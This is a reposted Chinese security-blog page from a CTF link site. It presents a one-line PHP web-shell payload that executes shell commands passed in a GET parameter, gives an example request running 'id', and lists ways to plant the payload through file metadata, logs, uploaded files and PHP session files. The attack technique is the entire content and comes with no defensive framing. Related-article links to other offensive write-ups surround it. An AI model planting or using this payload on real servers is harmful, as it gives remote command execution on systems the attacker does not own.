CTF导航 CTF导航

PHP实现代码执行的最短Payload

渗透技巧 3年前 (2022) admin
700 0 0



PHP实现代码执行的最短Payload



<?='$_GET[1]'?>


http://localhost:8000/rce.php?1=id


PHP实现代码执行的最短Payload


这个payload可以被用来反映在web应用程序的很多文件中


1、在元数据中 

2、在日志的某个地方 

3、在您控制的上传文件中 

4、在您的 PHP 会话中(它将被写入文件)


原文始发于微信公众号(Khan安全攻防实验室):PHP实现代码执行的最短Payload

版权声明:admin 发表于 2022年2月3日 上午2:37。
转载请注明:PHP实现代码执行的最短Payload | CTF导航

相关文章

Domain Persistence – AdminSDHolder
admin
1,039
代码审计之浅谈RASP技术
admin
106
提前解锁 | 甲方视角下的安全攻防建设
admin
567
获取vCenter锁屏主机hash
admin
165
It might Be Time to Rethink Phishing Awareness
admin
135
CVE-2024-21633 – MobSF Remote code execution
admin
129

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0